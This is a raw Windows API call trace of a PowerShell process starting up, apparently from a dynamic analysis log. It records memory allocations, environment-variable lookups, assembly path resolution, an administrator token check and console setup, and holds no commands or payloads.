	[0438.648] CoTaskMemFree (pv=0x2eaba0) 
	[0438.649] CoTaskMemAlloc (cb=0x104) returned 0x2eaba0
	[0438.649] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0438.649] CoTaskMemFree (pv=0x2eaba0) 
	[0438.674] CoTaskMemAlloc (cb=0x104) returned 0x2eaba0
	[0438.674] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0438.674] CoTaskMemFree (pv=0x2eaba0) 
	[0438.675] CoTaskMemAlloc (cb=0x104) returned 0x2eaba0
	[0438.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0438.675] CoTaskMemFree (pv=0x2eaba0) 
	[0438.675] CoTaskMemAlloc (cb=0x104) returned 0x2eaba0
	[0438.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0438.675] CoTaskMemFree (pv=0x2eaba0) 
	[0439.476] CoTaskMemAlloc (cb=0x104) returned 0x2eaba0
	[0439.476] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0439.476] CoTaskMemFree (pv=0x2eaba0) 
	[0439.479] CoTaskMemAlloc (cb=0x104) returned 0x2eaba0
	[0439.479] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0439.479] CoTaskMemFree (pv=0x2eaba0) 
	[0439.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0439.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0442.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0442.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0443.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0443.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0443.750] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0443.750] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0443.750] CoTaskMemFree (pv=0x2eadc0) 
	[0443.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0443.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0443.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0443.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x12d960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0443.930] SetErrorMode (uMode=0x1) returned 0x1
	[0443.930] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x12dbe0 | out: lpFileInformation=0x12dbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0443.930] SetErrorMode (uMode=0x1) returned 0x1
	[0444.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.194] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.194] CoTaskMemFree (pv=0x2eadc0) 
	[0444.197] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.197] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.197] CoTaskMemFree (pv=0x2eadc0) 
	[0444.197] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.197] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.198] CoTaskMemFree (pv=0x2eadc0) 
	[0444.200] CoCreateGuid (in: pguid=0x12dfa8 | out: pguid=0x12dfa8*(Data1=0x1e3876c8, Data2=0x517, Data3=0x4b44, Data4=([0]=0xb9, [1]=0xe, [2]=0x2a, [3]=0xef, [4]=0xf1, [5]=0xee, [6]=0xea, [7]=0x25))) returned 0x0
	[0444.203] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.204] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.204] CoTaskMemFree (pv=0x2eadc0) 
	[0444.207] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.207] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.207] CoTaskMemFree (pv=0x2eadc0) 
	[0444.209] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.209] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.209] CoTaskMemFree (pv=0x2eadc0) 
	[0444.217] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0444.232] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x12dc50 | out: lpConsoleScreenBufferInfo=0x12dc50) returned 1
	[0444.238] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0444.239] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x12dc50 | out: lpConsoleScreenBufferInfo=0x12dc50) returned 1
	[0444.240] GetVersionExW (in: lpVersionInformation=0x12dbe0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dbe0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0444.243] GetCurrentProcess () returned 0xffffffffffffffff
	[0444.244] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x12dc78 | out: TokenHandle=0x12dc78*=0x1c0) returned 1
	[0444.248] GetTokenInformation (in: TokenHandle=0x1c0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12db98 | out: TokenInformation=0x0, ReturnLength=0x12db98) returned 0
	[0444.249] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3467e0
	[0444.249] GetTokenInformation (in: TokenHandle=0x1c0, TokenInformationClass=0x8, TokenInformation=0x3467e0, TokenInformationLength=0x4, ReturnLength=0x12db98 | out: TokenInformation=0x3467e0, ReturnLength=0x12db98) returned 1
	[0444.250] DuplicateTokenEx (in: hExistingToken=0x1c0, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x12dcf8 | out: phNewToken=0x12dcf8*=0x1c8) returned 1
	[0444.250] GetTokenInformation (in: TokenHandle=0x1c0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12db98 | out: TokenInformation=0x0, ReturnLength=0x12db98) returned 0
	[0444.250] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x346770
	[0444.250] GetTokenInformation (in: TokenHandle=0x1c0, TokenInformationClass=0x8, TokenInformation=0x346770, TokenInformationLength=0x4, ReturnLength=0x12db98 | out: TokenInformation=0x346770, ReturnLength=0x12db98) returned 1
	[0444.250] CheckTokenMembership (in: TokenHandle=0x1c8, SidToCheck=0x2d9f6c8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x12dd08 | out: IsMember=0x12dd08) returned 1
	[0444.250] CloseHandle (hObject=0x1c8) returned 1
	[0444.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.309] CoTaskMemAlloc (cb=0x804) returned 0x1b7c9cc0
	[0444.309] GetConsoleTitleW (in: lpConsoleTitle=0x1b7c9cc0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0444.318] CoTaskMemFree (pv=0x1b7c9cc0) 
	[0444.356] CoTaskMemAlloc (cb=0x804) returned 0x1b7ca9f0
	[0444.356] GetConsoleTitleW (in: lpConsoleTitle=0x1b7ca9f0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0444.357] CoTaskMemFree (pv=0x1b7ca9f0) 
	[0444.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.359] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0444.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0444.556] SetConsoleCtrlHandler (HandlerRoutine=0x2a668dc, Add=1) returned 1
	[0444.575] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0444.577] CoCreateGuid (in: pguid=0x12ddf0 | out: pguid=0x12ddf0*(Data1=0x29627389, Data2=0xbbcb, Data3=0x4a46, Data4=([0]=0x8b, [1]=0xe1, [2]=0x7, [3]=0xbc, [4]=0xaf, [5]=0xcf, [6]=0xba, [7]=0x38))) returned 0x0
	[0444.578] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.578] CoTaskMemFree (pv=0x2eadc0) 
	[0444.603] WinSqmIsOptedIn () returned 0x0
	[0444.603] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.603] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.603] CoTaskMemFree (pv=0x2eadc0) 
	[0444.604] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.604] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.604] CoTaskMemFree (pv=0x2eadc0) 
	[0444.605] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.605] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.605] CoTaskMemFree (pv=0x2eadc0) 
	[0444.605] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.605] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.605] CoTaskMemFree (pv=0x2eadc0) 
	[0444.606] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.606] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.606] CoTaskMemFree (pv=0x2eadc0) 
	[0444.607] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.607] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.607] CoTaskMemFree (pv=0x2eadc0) 
	[0444.608] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.608] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.608] CoTaskMemFree (pv=0x2eadc0) 
	[0444.608] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.608] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.608] CoTaskMemFree (pv=0x2eadc0) 
	[0444.611] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.611] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.611] CoTaskMemFree (pv=0x2eadc0) 
	[0444.621] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.621] CoTaskMemFree (pv=0x2eadc0) 
	[0444.625] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
